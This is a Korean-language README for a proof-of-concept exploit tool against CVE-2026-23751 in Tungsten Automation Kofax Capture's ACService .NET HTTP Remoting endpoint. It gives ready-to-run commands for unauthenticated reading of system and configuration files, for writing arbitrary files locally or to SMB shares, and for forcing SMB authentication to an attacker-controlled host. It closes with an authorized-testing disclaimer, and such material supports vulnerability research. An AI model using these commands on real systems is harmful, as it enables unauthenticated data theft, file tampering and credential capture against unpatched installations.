
패치된 RemotingClient로 CVE-2026-23751 악용 (Tungsten Automation - Kofax Capture의 .NET HTTP Remoting을 통한 인증 없는 파일 읽기/쓰기 및 SMB 강제 인증)
Code White의 NewRemotingTricks에 설명된 기법의 개념 증명(PoC) 재구현으로, Tungsten Automation Kofax Capture를 대상으로 합니다.
제목: Tungsten Automation - Kofax Capture .NET HTTP Remoting을 통한 인증 없는 파일 읽기/쓰기 및 SMB 강제 인증
CVE: CVE-2026-23751
CVE-2026-23751은 Tungsten Automation Kofax Capture에 영향을 미치며, 인증되지 않은 원격 공격자가 Kofax Capture ACService가 노출하는 .NET HTTP Remoting 엔드포인트와 상호작용할 수 있게 합니다.
이 취약점은 다음과 같은 작업을 수행하는 데 악용될 수 있습니다:
PoC는 Code White의 NewRemotingTricks 프로젝트에서 관련 .NET Remoting 기법을 재구현합니다.
PoC는 Kofax Capture ACService HTTP Remoting 엔드포인트를 대상으로 합니다:
http://<target>:2424/ACService
포트 2424는 영향을 받는 서비스가 사용하는 기본 HTTP Remoting 포트입니다.
다음 예제는 대상에서 Windows hosts 파일을 읽습니다:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts
Kofax Capture 구성 파일도 유사하게 읽을 수 있습니다:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml
대상 경로 뒤에 내용을 지정하여 Kofax Capture 서비스가 접근할 수 있는 위치에 파일을 쓸 수 있습니다:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld
동일한 기능을 UNC 경로와 함께 사용하여 원격 SMB 공유에 쓸 수 있습니다:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld
원격 리소스에 접근할 수 있는지 여부는 Kofax Capture 서비스의 권한 및 보안 컨텍스트에 따라 달라집니다.
file:// URI를 제공하여 대상이 원격 SMB 리소스에 접근하도록 유도할 수 있습니다:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt
이로 인해 대상 환경 및 보안 구성에 따라 영향을 받는 호스트가 공격자가 제어하는 SMB 서버에 인증을 시도할 수 있습니다.
이 취약점은 Kofax Capture의 ACService가 .NET HTTP Remoting을 사용하는 것과 관련이 있습니다.
.NET Remoting은 다양한 URI 스킴과 객체 직렬화 메커니즘을 지원합니다. 노출된 Remoting 엔드포인트와 특정 방식으로 상호작용함으로써, 인증되지 않은 클라이언트가 서비스로 하여금 클라이언트가 제공한 경로를 사용하여 파일 시스템 작업을 수행하도록 유도할 수 있습니다.
PoC는 이 동작을 다음과 같은 용도로 사용할 수 있음을 보여줍니다:
file:// 리소스 접근 트리거PoC는 현재 파일에 문자열 데이터를 쓰는 것을 시연합니다. 다른 파일 유형 및 페이로드 형식은 소스 코드를 적절히 수정하여 지원할 수 있습니다.
이 구현은 다음 연구 및 기법을 기반으로 합니다:
Code White - NewRemotingTricks
ACService에 대한 네트워크 접근RemotingClient_MBRO_Lazy.exe악용을 위해 Kofax Capture 서비스에 대한 인증은 필요하지 않습니다.
이 저장소는 보안 연구, 취약점 검증 및 승인된 침투 테스트 목적으로만 제공됩니다.
명시적 승인 없이 이 PoC를 시스템에 사용하지 마십시오. 저자는 이 소프트웨어의 오용으로 인한 손상, 데이터 손실, 무단 접근 또는 기타 결과에 대해 책임을 지지 않습니다.